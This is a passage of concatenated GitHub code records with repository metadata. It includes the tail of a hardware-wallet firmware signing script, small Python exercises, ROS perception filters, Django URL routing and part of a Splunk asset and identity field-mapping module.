wrong!!!')))\n\n\n@main.command('sign')\n@click.argument('version', required=True)\n@click.option('--pubkey-num', '-k', type=int, help='Which key # to use for signing', default=0)\n@click.option('--high_water', '-h', is_flag=True, help='Mark version as new highwater mark (no downgrades below this version)')\n@click.option('--verbose', '-v', default=False, is_flag=True, help='Show numbers related to signature')\n@click.option('--hw-compat', '-m', type=int, metavar='BITMASK', help=\"Set HW compat field (mk number)\")\n@click.option('--backdate', type=int, metavar='DAYS',\n help='Make downgrade attack test version', default=0)\n@click.option('--build_dir', '-b', default='l-port/build-COLDCARD')\n@click.option('--resign_file', '-r', type=click.File('rb'),\n help='Replace existing signature', default=None)\n@click.option('--outfn', '-o', type=click.Path(),\n help='Output filename', default='firmware-signed.bin')\n@click.option('--keydir', type=str, metavar='DIRPATH', help=\"Where to find priv keys for signing\", default='keys')\ndef doit(keydir, outfn=None, build_dir=None, high_water=False,\n current=False, hw_compat=None,\n version='0.1a', pubkey_num=0, backdate=0, verbose=False, resign_file=None):\n \"Add signature into binary file before it becomes a DFU file.\"\n\n assert len(version) < 8, \"Version string limited to 8 bytes, got: %r\" % version\n\n # load key\n try:\n sk = SigningKey.from_pem(open(f\"{keydir}/{pubkey_num:02d}.pem\").read())\n except FileNotFoundError:\n click.secho(f\"You don't have that key ({pubkey_num}), so using key zero instead!\", fg='red')\n pubkey_num = 0\n sk = SigningKey.from_pem(open(f\"{keydir}/{pubkey_num:02d}.pem\").read())\n \n if resign_file:\n whole = resign_file.read()\n vectors = whole[0:FW_HEADER_OFFSET]\n body = whole[FW_HEADER_OFFSET+FW_HEADER_SIZE:]\n #click.echo('%s: %d + (128) + %d size' % (resign_file.name, len(vectors), len(body)))\n else:\n vectors = open(build_dir + '/firmware0.bin', 'rb').read()\n body = open(build_dir + '/firmware1.bin', 'rb').read()\n\n if hw_compat == 4:\n hw_compat = MK_4_OK\n elif hw_compat in {3, None}:\n hw_compat = MK_2_OK | MK_3_OK\n else:\n assert not \"known\"\n\n assert len(vectors) <= FW_HEADER_OFFSET, \"isr vectors area is too big!\"\n assert len(body) >= FW_MIN_LENGTH, \"main firmware is too small: %d\" % len(body)\n\n 
body_len = align_to(len(body), 512)\n\n if hw_compat & (MK_1_OK | MK_2_OK | MK_3_OK):\n # bugfix: size must be non-page aligned, so extra bytes are erased past end\n if (body_len % 4096) == 0:\n body_len += 512\n assert body_len % 512 == 0, body_len\n else:\n # bugfix: PSRAM-based products (Mk4, Q1) need to erase 4k blocks, so\n # trouble happens if final binary isn't aligned to that size.\n body_len = align_to(body_len, 4096)\n assert body_len % 4096 == 0, body_len\n\n # pad out \n vectors = pad_to(vectors, FW_HEADER_OFFSET)\n body = pad_to(body, body_len)\n version = pad_to(version.encode('ascii'), 8, b'\\0')\n\n hdr = header( magic_value=FW_HEADER_MAGIC,\n version_string=version,\n firmware_length=FW_HEADER_OFFSET+FW_HEADER_SIZE+body_len,\n install_flags=(FWHIF_HIGH_WATER if high_water else 0x0),\n hw_compat=hw_compat,\n best_ts=bytes(8),\n future=b'\\0'*(4*FWH_NUM_FUTURE),\n signature=b'\\xff'*64,\n pubkey_num=pubkey_num,\n timestamp=timestamp(backdate) )\n\n assert FW_MIN_LENGTH <= hdr.firmware_length <= FW_MAX_LENGTH, hdr.firmware_length\n\n if hw_compat & MK_4_OK:\n # new value for Mk4: limited only by final binary size, not SPI flash\n USB_MAX_LEN = 1472 * 1024\n else:\n # actual file length limited by size of SPI flash area reserved to txn data/uploads\n USB_MAX_LEN = (786432-128)\n\n assert hdr.firmware_length <= USB_MAX_LEN, \\\n \"too big for our USB upgrades: %d = %d bytes too big\" % (\n hdr.firmware_length, hdr.firmware_length-USB_MAX_LEN)\n\n print(\"Remaining flash space: %d bytes\" % (USB_MAX_LEN - hdr.firmware_length))\n\n binhdr = struct.pack(FWH_PY_FORMAT, *hdr)\n assert len(binhdr) == FW_HEADER_SIZE\n assert len(vectors + binhdr[:-64]) == 0x3fc0\n\n hashable = vectors + binhdr[:-64] + body\n fw_hash = sha256(sha256(hashable).digest()).digest()\n\n assert len(fw_hash) == 32\n\n if verbose:\n print(\"Hdr: %s\" % repr(hdr))\n print('Hash: %s' % b2a_hex(fw_hash).decode('ascii'))\n\n from ecdsa.util import sigencode_string\n sig = sk.sign_digest(fw_hash, sigencode=sigencode_string)\n\n assert len(sig) == 64\n final = binhdr[:-64] + sig\n assert len(final) == FW_HEADER_SIZE\n\n if verbose:\n print('Signature: %s' % b2a_hex(sig).decode('ascii'))\n\n open(outfn, 'wb').write(vectors + final + body)\n\n if verbose:\n print(\"Wrote: %s\" % outfn)\n print(\"Signed by pubkey=%d install_flags=0x%x\" % (hdr.pubkey_num, hdr.install_flags))\n \n# EOF\n","repo_name":"Coldcard/firmware","sub_path":"cli/signit.py","file_name":"signit.py","file_ext":"py","file_size_in_byte":13048,"program_lang":"python","lang":"en","doc_type":"code","stars":467,"dataset":"github-code","pt":"70"}
+{"seq_id":"75106952227","text":"import json\n\n\nwith open (\"states.json\") as stat:\n data = json.load(stat)\n\n for i in data[\"states\"]:\n print(i)\n\ndict1 ={\n\n \"name\": \"Lisa\",\n \"designation\": \"programmer\",\n \"age\": \"34\",\n \"salary\": \"54000\"\n\n\n}\n\nwith open(\"myjs.json\",\"w\") as out:\n json.dump(dict1, out, indent=\"\")\n\njdict = json.dumps(dict1, indent=\"\")\n\nprint(jdict)\n\nsortdict= sorted(dict1)\n\njdict2 = json.dumps(sortdict, indent=4)\n\nprint(jdict2)\n\nwith open (\"states.json\") as stat:\n data = json.load(stat)\n newStates=[]\n for i in data[\"states\"]:\n state={\"name\": i[\"name\"], \"abbreviation\" : i[\"abbreviation\"]}\n newStates.append(state)\n statesDict={\"States\" : newStates}\n print(statesDict)\n with open(\"states_no_area.json\", \"w\") as out:\n json.dump(statesDict,out, indent= 2)\n\n\n","repo_name":"emabongio/OAVN","sub_path":"EsVari/esb_part2.py","file_name":"esb_part2.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19573684660","text":"#!/usr/bin/env python\n\nfrom hlpr_perception_msgs.msg import ExtractedFeaturesArray\nfrom colorsys import rgb_to_hsv, hsv_to_rgb\nfrom yaml_include_loader.loader import *\nimport hsv_utils\nimport rospy\nimport yaml\n\ndef hue_filter(h_range):\n def f(msg, idxs=None):\n if idxs is None:\n idxs = range(len(msg.objects))\n\n keep_idxs = []\n\n for idx, obj in enumerate(msg.objects):\n if idx in idxs:\n h = obj.basicInfo.hue\n if hsv_utils.in_hue_range(h, h_range):\n keep_idxs.append(idx)\n\n return keep_idxs\n return f \n\ndef hsv_filter(h_range, s_range, v_range):\n def f(msg, idxs=None):\n if idxs is None:\n idxs = range(len(msg.objects))\n\n keep_idxs = []\n\n for idx, obj in enumerate(msg.objects):\n if idx in idxs:\n r = obj.basicInfo.rgba_color.r\n g = obj.basicInfo.rgba_color.g\n b = obj.basicInfo.rgba_color.b\n h, s, v = rgb_to_hsv(r, g, b)\n if hsv_utils.in_hsv_range(h, s, v, h_range, s_range, v_range):\n keep_idxs.append(idx)\n\n return keep_idxs\n return f\n\ndef rgb_filter(r_range, g_range, b_range):\n def f(msg, idxs=None):\n if idxs is None:\n idxs = range(len(msg.objects))\n\n keep_idxs = []\n\n for idx, obj in enumerate(msg.objects):\n if idx in idxs:\n r = obj.basicInfo.rgba_color.r\n g = obj.basicInfo.rgba_color.g\n b = obj.basicInfo.rgba_color.b\n if hsv_utils.in_rgb_range(r, g, b, r_range, g_range, b_range):\n keep_idxs.append(idx)\n\n return keep_idxs\n return f\n\ndef largest_filter(msg, idxs=None):\n if idxs is None:\n idxs = range(len(msg.objects))\n\n largest_idx = None\n largest_vol = -float('inf')\n\n for idx, obj in enumerate(msg.objects):\n if idx in idxs:\n vol = obj.obb.bb_dims.x*obj.obb.bb_dims.y*obj.obb.bb_dims.z\n if vol > largest_vol:\n largest_idx = idx\n largest_vol = vol\n\n if largest_idx is None:\n return []\n else:\n return [largest_idx] \n\n# ordered is only accepted kwarg\ndef compose_filters(*filters, **kwargs):\n ordered = kwargs.pop('ordered', True)\n\n def f(msg, idxs=None):\n if ordered:\n keep_idxs = filters[0](msg, idxs)\n for filt in filters[1:]:\n keep_idxs = filt(msg, keep_idxs)\n else:\n keep_idxs = list(reduce(lambda x, y: x.intersection(y), \n [set(filt(msg, idxs)) for filt in filters], \n []))\n return keep_idxs\n\n return f\n\ndef object_filter(params):\n h_range = (params['hue']['min'], params['hue']['max'])\n s_range = (params['saturation']['min'], params['saturation']['max'])\n v_range = (params['value']['min'], params['value']['max'])\n\n def f(msg):\n return compose_filters(hsv_filter(h_range, s_range, v_range), largest_filter)(msg)\n \n return f\n\ndef object_filter_from_yaml(yaml_file):\n with open(yaml_file, 'r') as f:\n params = yaml.load(f, Loader=YAMLIncludelLoader)\n return object_filter(params)\n\ndef object_filters_from_yaml(yaml_file):\n with open(yaml_file, 'r') as f:\n objects = yaml.load(f, Loader=YAMLIncludeLoader)['objects']\n return {obj.keys()[0]: object_filter(obj[obj.keys()[0]]) for obj in objects} \n\ndef load_tasks(yaml_file):\n with open(yaml_file, 'r') as f:\n tasks = yaml.load(f, Loader=YAMLIncludeLoader)['tasks']\n\n return {task.keys()[0]: {obj.keys()[0]: object_filter(obj[obj.keys()[0]]) for obj in task[task.keys()[0]]['objects']} for task in tasks}\n\n","repo_name":"ragtz/feature_extraction_scripts","sub_path":"object_filters.py","file_name":"object_filters.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"16620839453","text":"import requests\n\ndef retornaCep(cep):\n response = requests.get(\"https://viacep.com.br/ws/{}/json/\".format(cep)) #Puxa as informações do site(requisição de api)\n \n print(response.status_code) #Retorna 200 quando da certo\n print(response.json()) #Printa as informações como um arquivo json(dicionario/dict)\n\n dadosCep = response.json()\n print (dadosCep[\"logradouro\"])\n print (dadosCep[\"bairro\"])\n return dadosCep\n\ndef retornaSite(url):\n response = requests.get(url)\n return response.text\n\ndef retornaPokemon(pokemon):\n response = requests.get(\"https://pokeapi.co/api/v2/pokemon/{}\".format(pokemon))\n dadosPokemon = response.json()\n return dadosPokemon\n\nif __name__ == '__main__':\n response = retornaSite(\"https://globallab.org/en/#.YQ7Rk1PPyUk\")\n print (response)\n #retornaCep(\"83215290\")\n # dadosPokemon = retornaPokemon(\"pikachu\")\n # print (dadosPokemon[\"sprites\"][\"front_shiny\"])","repo_name":"Vinezius/Python-Aulas-Iniciais","sub_path":"Aula03/Importacao.py","file_name":"Importacao.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29094996150","text":"#\n# @lc app=leetcode id=17 lang=python3\n#\n# [17] Letter Combinations of a Phone Number\n#\nclass Solution:\n def letterCombinations(self, digits: str) -> List[str]:\n digits_letter = {\n '2': ['a', 'b', 'c'],\n '3': ['d', 'e', 'f'],\n '4': ['g', 'h', 'i'],\n '5': ['j', 'k', 'l'],\n '6': ['m', 'n', 'o'],\n '7': ['p', 'q', 'r', 's'],\n '8': ['t', 'u', 'v'],\n '9': ['w', 'x', 'y', 'z']\n }\n\n result = []\n\n def backtracking(index, cur_word):\n if len(cur_word) == len(digits):\n result.append(cur_word)\n return\n\n letters = digits_letter[digits[index]]\n for a in letters:\n backtracking(index+1, cur_word+a)\n\n if digits == \"\":\n return result\n backtracking(0, '')\n return result\n","repo_name":"M-Riku/.leetcode","sub_path":"17.letter-combinations-of-a-phone-number.py","file_name":"17.letter-combinations-of-a-phone-number.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"23164460753","text":"# Author: YOUR NAME HERE\n# Date: DATE SUBMITTED\n\n# Use word_tokenize to split raw text into words\nfrom string import punctuation\n\nimport nltk\nfrom nltk.tokenize import word_tokenize\n\n\nclass LimerickDetector:\n\n def __init__(self):\n \"\"\"\n Initializes the object to have a pronunciation dictionary available\n \"\"\"\n self._pronunciations = nltk.corpus.cmudict.dict()\n\n def num_syllables(self, word):\n \"\"\"\n Returns the number of syllables in a word. If there's more than one\n pronunciation, take the shorter one. If there is no entry in the\n dictionary, return 1.\n \"\"\"\n\n return 1\n\n def rhymes(self, a, b):\n \"\"\"\n Returns True if two words (represented as lower-case strings) rhyme,\n False otherwise.\n \"\"\"\n\n return False\n\n def is_limerick(self, text):\n \"\"\"\n Takes text where lines are separated by newline characters. Returns\n True if the text is a limerick, False otherwise.\n\n A limerick is defined as a poem with the form AABBA, where the A lines\n rhyme with each other, the B lines rhyme with each other (and not the A\n lines).\n\n (English professors may disagree with this definition, but that's what\n we're using here.)\n \"\"\"\n\n return False\n\nif __name__ == \"__main__\":\n buffer = \"\"\n inline = \" \"\n while inline != \"\":\n buffer += \"%s\\n\" % inline\n inline = input()\n\n ld = LimerickDetector()\n print(\"%s\\n-----------\\n%s\" % (buffer.strip(), ld.is_limerick(buffer)))\n","repo_name":"Pinafore/cl1-hw","sub_path":"limerick/limerick.py","file_name":"limerick.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"70"}
+{"seq_id":"39773230907","text":"import mysql.connector, ipaddress, os, whois\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"\",\n database=\"ip2location\"\n\n)\nmycursor = mydb.cursor()\ndef abc(domain):\n ip_address = int(ipaddress.ip_address(domain))\n ip = \"select country_name,region_name,city_name from ip2location_db5 where ip_from = {} or ip_to = {}\"\n mycursor.execute(ip.format(ip_address, ip_address))\n myresult = mycursor.fetchall()\n if myresult == []:\n return \"Not Found\"\n else:\n for i in myresult:\n b = []\n for item in i:\n b.append((item.decode('utf-8')))\n c = ', '.join(b)\n return c\n","repo_name":"Hexogenua/project_1","sub_path":"mlq.py","file_name":"mlq.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"11326755365","text":"# -*- coding: utf-8 -*-\r\n\r\ndef insert_sort(list):\r\n for i in range(1, len(list)):\r\n temp = list[i]\r\n j = i - 1\r\n if list[i] < list[j]:\r\n list[i], list[j] = list[j], list[i]\r\n j = j - 1\r\n while j >= 0 and list[j] > temp:\r\n list[j+1] = list[j]\r\n j = j - 1\r\n list[j+1] = temp\r\n\r\nif __name__ == \"__main__\":\r\n list = [7, 11, 8, 12, 18, 2, 5, 9, 20, 6, 32, 13]\r\n print(list)\r\n insert_sort(list)\r\n print(list)\r\n","repo_name":"cassieeric/Python-Exercises_Interview_questions","sub_path":"简单算法题/排序算法/插入排序/插入排序方法2.py","file_name":"插入排序方法2.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"70"}
+{"seq_id":"39052136058","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.contrib.auth import views as auth_views\n\nfrom django.urls import path, include\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nimport wallet.views\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Banka API\",\n default_version='v1',\n description=\"A simple banking app for non-financial people. (Django)\",\n terms_of_service=\"https://www.google.com/policies/terms/\",\n contact=openapi.Contact(email=\"contact@snippets.local\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=[permissions.AllowAny],\n)\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('notifications/', wallet.views.ListUserNotificationAPIView.as_view()),\n path('notification-update/', wallet.views.UpdateNotificationAPIView.as_view()),\n\n # urls for authentications\n path('authentication/', include('authentication.urls')),\n path('wallet/', include('wallet.urls')),\n\n # urls for swagger documentation\n path('', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n path('swagger.json', schema_view.without_ui(cache_timeout=0), name='schema-json'),\n path('redoc/', schema_view.with_ui('redoc', cache_timeout=0), name='schema-redoc'),\n\n]\n\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL,\n document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","repo_name":"iradtaufique/banka","sub_path":"banka/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19722847847","text":"import abc\nimport collections\nimport hashlib\nimport heapq\nimport logging\nimport re\nimport sys\n\nimport splunk\n\nfrom identity import Identity\nfrom identity import IdentityLookup\n\nfrom splunk.appserver.mrsparkle.lib.util import make_splunkhome_path\nsys.path.append(make_splunkhome_path([\"etc\", \"apps\", \"SA-Utils\", \"lib\"]))\nfrom ..error import LookupConversionErrors\nfrom SolnCommon import ipMath\nfrom SolnCommon.modular_input import logger\n\n# Constants for field deferral status.\n# DEFERRED indicates that a line's processing must be deferred due to a particular\n# field value; NOT_DEFERRED indicates that no deferral is necessary.\nDEFERRED = True\nNOT_DEFERRED = False\n\n# Constants for default argument values.\nDEFAULT_DEPENDENCIES = {}\nDEFAULT_DEFERRED_DEPENDENCIES = {}\nDEFAULT_REQUIREMENTS = {}\n\n\nclass AbstractFieldMapping(object):\n '''Abstract field mapping class.'''\n __metaclass__ = abc.ABCMeta\n \n # Read-only Properties\n @abc.abstractproperty\n def name(self): \n pass\n\n @abc.abstractproperty\n def depends(self): \n pass\n\n @abc.abstractproperty\n def requires(self):\n pass\n\n @abc.abstractproperty\n def deferred_requires(self):\n pass\n\n @abc.abstractproperty\n def delim(self):\n pass\n \n @abc.abstractproperty\n def is_key_field(self):\n pass\n\n @abc.abstractproperty\n def is_generated(self):\n pass\n\n @abc.abstractproperty\n def is_tracked(self):\n pass\n\n # Methods\n @abc.abstractmethod\n def validate(self):\n pass\n \n @abc.abstractmethod\n def convert(self):\n pass\n \n @abc.abstractmethod\n def convert_deferred(self):\n pass\n\n @abc.abstractmethod\n def postprocess(self):\n pass\n\n \nclass FieldMapping(AbstractFieldMapping):\n '''Generic class for handling field mappings.\n Named FieldMapping to avoid conflicts with splunk.models.Field.\n \n See the code for this class for more details on the meaning of each parameter. \n '''\n\n def __init__(self,\n name,\n depends=DEFAULT_DEPENDENCIES,\n requires=DEFAULT_REQUIREMENTS,\n deferred_requires=DEFAULT_DEFERRED_DEPENDENCIES,\n is_generated=False,\n is_key_field=False,\n is_persistent=False,\n is_tracked=False,\n delim=None,\n replace_null=None,\n custom_data=None):\n '''Initialize a FieldMapping class.\n \n @param name: The output field name.\n @param dependencies: A list of this conversion's dependencies.\n @param requirements: A list of this conversions requirements.\n @param deferred_requirements: A list of this conversion's deferred requirements.\n @param is_key_field: True if this value is a key field in the generated lookup table.\n @param is_generated: True if this field is generated (i.e., not present in the input file).\n @param is_tracked: True if this field should keep track of its values.\n @param delim: A delimiter for handling multi-valued input fields.\n @param replace_null: A replacement string for handling missing input values.\n '''\n\n ### Positional parameters ###\n self._name = name\n self._depends = depends\n self._requires = requires\n self._deferred_requires = deferred_requires\n \n ### Keyword parameters ###\n self._delim = delim\n self._is_generated = is_generated\n self._is_key_field = is_key_field\n self._is_persistent = is_persistent\n self._is_tracked = is_tracked\n self._delim = delim\n self._replace_null = replace_null\n self._custom_data = custom_data\n\n # Internal state. 
\n self._all_values = set() # Tracks all values of the field.\n\n ### Properties ###\n @property\n def name(self):\n return self._name\n \n @property\n def depends(self):\n return self._depends\n \n @property\n def requires(self):\n return self._requires\n \n @property\n def deferred_requires(self):\n return self._deferred_requires\n\n @property\n def delim(self):\n return self._delim\n \n @property\n def is_generated(self):\n return self._is_generated\n \n @property\n def is_key_field(self):\n return self._is_key_field\n\n @property\n def is_persistent(self):\n return self._is_persistent\n\n @property\n def is_tracked(self):\n return self._is_tracked\n \n @property\n def replace_null(self):\n return self._replace_null\n\n @property\n def custom_data(self):\n return self._custom_data\n\n ### Validation actions\n def validate(self, value, *args, **kwargs):\n '''Validate that the input value of the field is correct.\n If an input field does not validate, the entire input line is \n rejected. Default validation is to pass the field along unchanged,\n since all input fields from a csv.DictReader will be instances\n of basestring.\n \n Generated fields always validate since they do not actually exist.\n Generated fields should set self._is_generated=True in their\n Field specification since the value passed in for a field that does\n not exist in the original CSV file will be None.\n ''' \n if isinstance(value, basestring) or (value is None and self.is_generated) or isinstance(self.replace_null, basestring):\n return True\n return False\n\n ### Preprocessing actions\n def preprocess(self, value, *args, **kwargs):\n # Note: Only the initial values of fields can be tracked, not their \n # converted values.\n if self.is_tracked and value:\n if self.delim and isinstance(value, basestring):\n self._all_values.update(value.split(self.delim))\n else:\n self._all_values.add(value)\n\n ### Conversion actions\n def convert(self, value, dependencies, requirements, record_num):\n '''The default action is to return the string unchanged.\n Return value from any convert() function is expected to be\n a tuple consisting of:\n\n (val, deferred_status)\n\n where:\n \n val = output value (possibly a list)\n deferred_status = Boolean indicating whether this field's\n value forces the line to undergo deferred\n processing.\n\n Deferred fields will cause the source line to be placed into\n a separate queue for processing. ONLY fields that actually \n require deferred processing will be processed during the \n deferred processing pass; the remainder of the line is not processed\n again.\n \n Generated fields MUST implement a convert() method of their own,\n to avoid raising AttributeError here. Only pure strings can be\n converted using the base FieldMapping class.\n '''\n if value is None and self.replace_null is not None:\n return (self.replace_null, NOT_DEFERRED)\n else:\n return (value.strip(), NOT_DEFERRED)\n\n def convert_deferred(self, *args, **kwargs):\n '''Conduct deferred field processing taking into account any saved \n state accumulated by the class. Default behavior is to do nothing and return\n the value\n '''\n pass\n\n def postprocess(self, *args, **kwargs):\n '''Conduct postprocessing for any saved state accumulated by the \n class. Default behavior is to do nothing and return nothing. 
If value\n        tracking is enabled, however, the set of all tracked values is returned.\n        '''\n        if self.is_tracked:\n            return self._all_values\n        return None\n\n\nclass AssetIdFieldMapping(FieldMapping):\n    \n    def convert(self, value, dependencies, requirements, record_num):\n        '''Concatenate ip/mac/nt_host/dns to form an asset_id.\n        Zero-length string will evaluate to false.\n        \n        The asset_id field refers to the value in the ORIGINAL lookup\n        table, not the converted one. This allows us to correlate\n        the asset with a specific line in the original user file,\n        even though a single range might expand to many lines\n        in the expanded lookup file.\n        \n        Generates the same asset_id as assetLookup.py. Order is\n        important to maintain continuity with the previous assetLookup.py\n        implementation.\n        \n        Any incoming value is ignored.\n        '''\n        \n        asset_id = ''.join([requirements.get(i, '') for i in ['ip', 'mac', 'nt_host', 'dns']])\n\n        # Zero-length string will evaluate to false\n        return (hashlib.sha1(asset_id).hexdigest() if asset_id else '', NOT_DEFERRED)\n\n\nclass AssetTagFieldMapping(FieldMapping):\n\n    def convert(self, value, dependencies, requirements, record_num):\n        '''Return the asset tag for the host.'''\n        \n        # Incoming value is actually ignored for asset_tag as it is a generated field.\n        \n        # Retrieve dependencies\n        bunit = dependencies.get('bunit', [])\n        categories = dependencies.get('category', [])\n\n        asset_tag = set()\n        \n        for bField in ['should_timesync', 'should_update', 'requires_av']:\n            try:\n                if splunk.util.normalizeBoolean(dependencies.get(bField, False)):\n                    asset_tag.add(bField)\n            except:\n                # Catch exception in case the assets.csv entry cannot be\n                # interpreted as a Boolean.\n                pass\n        \n        # Make sure to add multiple categories if they exist.\n        if isinstance(categories, list):\n            for category in categories:\n                asset_tag.add(category)\n        else:\n            asset_tag.add(categories)\n        \n        try:\n            if splunk.util.normalizeBoolean(dependencies.get('is_expected', False)):\n                asset_tag.add('expected')\n        except ValueError:\n            # Catch exception in case the assets.csv entry cannot be\n            # interpreted as a Boolean.\n            pass\n        \n        # Business unit is single-valued \n        asset_tag.add(bunit)\n\n        # Discard empty entries.\n        asset_tag.discard('')\n\n        # Return multi-valued output IFF there is more than one item.\n        if len(asset_tag) == 0:\n            return ('', NOT_DEFERRED)\n        elif len(asset_tag) == 1:\n            return (asset_tag.pop(), NOT_DEFERRED)\n        else:\n            return (list(asset_tag), NOT_DEFERRED)\n\n\nclass BooleanFieldMapping(FieldMapping):\n    \n    # Separate validation is not required here since this function is \n    # guaranteed to return a boolean value.\n    \n    def convert(self, value, dependencies, requirements, record_num):\n        '''Return a Boolean \"true\" or \"false\" if the input field can\n        be appropriately converted.\n        '''\n        \n        try:\n            if splunk.util.normalizeBoolean(value, enableStrictMode=True, includeIntegers=True):\n                return ('true', NOT_DEFERRED)\n        except ValueError:\n            pass\n        return ('false', NOT_DEFERRED)\n\n\nclass CategoryFieldMapping(FieldMapping):\n\n    def convert(self, value, dependencies, requirements, record_num):\n        '''Return a list of categories, given an input pipe-separated string\n        of categories, conducting the following transformations:\n        \n        1. 
If category == cardholder, add category=pci\n \n Also maintain a list of categories for output to ancillary lookup file.\n The ancillary lookup file will be output during the postprocess() action.\n \n '''\n \n categories = set(value.split(self.delim))\n\n if 'cardholder' in categories:\n categories.add('pci')\n\n # Discard empty entries.\n categories.discard('')\n\n # Update the set of all categories.\n self._all_values.update(categories)\n\n # Return multi-valued IFF there is only more than one item.\n if len(categories) == 0:\n return ('', NOT_DEFERRED)\n if len(categories) == 1:\n return (categories.pop(), NOT_DEFERRED)\n else:\n return (list(categories), NOT_DEFERRED)\n\n\nclass IdentityFieldMapping(FieldMapping):\n\n def __init__(self, *args, **kwargs):\n '''Set up the order in which identity lookups will be processed.\n \n The default order, in case there is an error in retrieving the\n identityLookup.conf configuration, mimics the previous behavior\n of identityLookup.py:\n \n identity (exact match), email, email_short, convention\n '''\n\n # Custom data specification.\n #\n # The configuration object stored in self._custom_data is a \n # util.SplunkIdentityLookupConf object and will have these fields:\n #\n # case_sensitive (Boolean)\n # convention (Boolean)\n # conventions (List)\n # email (Boolean)\n # email_short (Boolean)\n # exact (Boolean)\n # match_order (List)\n #\n # The case_sensitive value is unused here - case sensitivity must\n # be specified in the lookup definition.\n\n # Regular expression for extracting e-mail addresses\n self._email_rx = re.compile(Identity.emailREpattern)\n \n # Build the regex for string replacements from the defined conventions,\n # based on the set of valid field names in the input CSV that can\n # be used for replacements (this is equivalent to the \"dependencies\" at\n # this point. 
To use ALL fields including custom fields, we would need to\n # extrapolate this to accept an ancillary value in __init__, and make the\n # identity field depend on the final values of ALL other fields including\n # custom fields).\n self._conventionValRE = self.buildReplacementConventions(kwargs.get('depends', []))\n \n super(IdentityFieldMapping, self).__init__(*args, **kwargs)\n\n def buildReplacementConventions(self, fields):\n '''Build a regular expression that will match all field names in the\n current identities.csv file.'''\n \n rx = []\n for field in fields:\n rx.append('{0}'.format(field))\n rx = '(' + '|'.join(rx) + ')\\((\\d+)?\\)'\n\n return re.compile(rx)\n \n def convert(self, value, dependencies, requirements, record_num):\n '''Return a set of identities for the given input.'''\n \n # Create the output dictionary\n identities = {}\n\n # Retrieve the current field value and split into identities.\n # These are used for exact matching.\n if self.custom_data.exact:\n identities[IdentityLookup.PARAM_EXACT] = [i.strip() for i in value.split(self._delim) if i != '']\n \n if self.custom_data.email:\n # Retrieve dependencies\n email = dependencies.get('email', None)\n # Get the email address and short e-mail address\n if email is not None and email != '':\n identities[IdentityLookup.PARAM_EMAIL] = [email]\n if self.custom_data.email_short:\n rx = self._email_rx.match(email)\n if rx:\n identities[IdentityLookup.PARAM_EMAIL_SHORT] = [rx.group(1)]\n \n # Format the identities based on any conventions derived from\n # identityLookup.conf.\n #\n # A convention is a string composed of ().()\n # indicating that the should be replaced with \n # characters from the actual field value.\n #\n # Per SOLNESS-3406, non-field name portions of the string\n # are also permitted in the convention. For instance:\n #\n # first(1)last().admin\n #\n # would represent a naming scheme for administrative Kerberos principals.\n if self.custom_data.convention:\n for conventionStr in self.custom_data.conventions:\n\n # Get the convention string, which should be a text string\n # containing replacement parameters in the form\n # (). These portions of the string will be\n # replaced directly with the corresponding field and character\n # count. If the field does not exist in the input, the empty\n # string will be used as a replacement.\n #\n # We improve on the previous handling of convention matching\n # by eliminating two cases from the output:\n # 1. Cases where zero successful field replacements could be\n # performed. For instance, if no successful field replacements\n # could be made, the convention string \"first(1).last\" could\n # result in an identity value of \".\", which is wrong.\n #\n # 2. 
Cases where the replacement string included only empty\n # replacements.\n matchCount = 0\n nonEmptyMatchCount = 0\n \n conventionValMatch = self._conventionValRE.finditer(conventionStr)\n\n # identityStr is the final value that we will return.\n identityStr = conventionStr\n for valMatch in conventionValMatch:\n fieldValue = dependencies.get(valMatch.group(1), False)\n if fieldValue and fieldValue != '':\n matchCount += 1\n if valMatch.group(2) is None or len(valMatch.group(2)) == 0:\n # Convention specified no replacement character length,\n # indicating to replace with the full string.\n strLength = len(fieldValue) \n else:\n # Replacement character length is not empty, \n # indicating to replace with a substring.\n strLength = int(valMatch.group(2))\n \n # Get the replacement value.\n replacementValue = fieldValue[:strLength]\n \n # If the replacement value is not empty, increment\n # the count of non-empty matches.\n if len(replacementValue) > 0:\n nonEmptyMatchCount += 1\n identityStr = identityStr.replace(valMatch.group(0), replacementValue)\n\n else:\n # A field value was not supplied in the input data.\n # Replace it with a blank in the output string.\n identityStr = identityStr.replace(valMatch.group(0), '')\n \n # Output the identity IFF more than one non-empty match was made.\n if matchCount > 0 and nonEmptyMatchCount > 0:\n curr = identities.setdefault(IdentityLookup.PARAM_CONVENTION, []) \n curr.append(identityStr)\n else:\n # Do not add the identity.\n pass\n \n # Output the identity values in order based on the configuration.\n # This order will be used to output the CSV files, so that the first\n # match is successful.\n # To deduplicate entries, we use an OrderedDict to maintain the match order,\n # but also deduplicate identity keys while respecting case.\n output = collections.OrderedDict()\n for item in self.custom_data.match_order:\n for representation in identities.get(item, 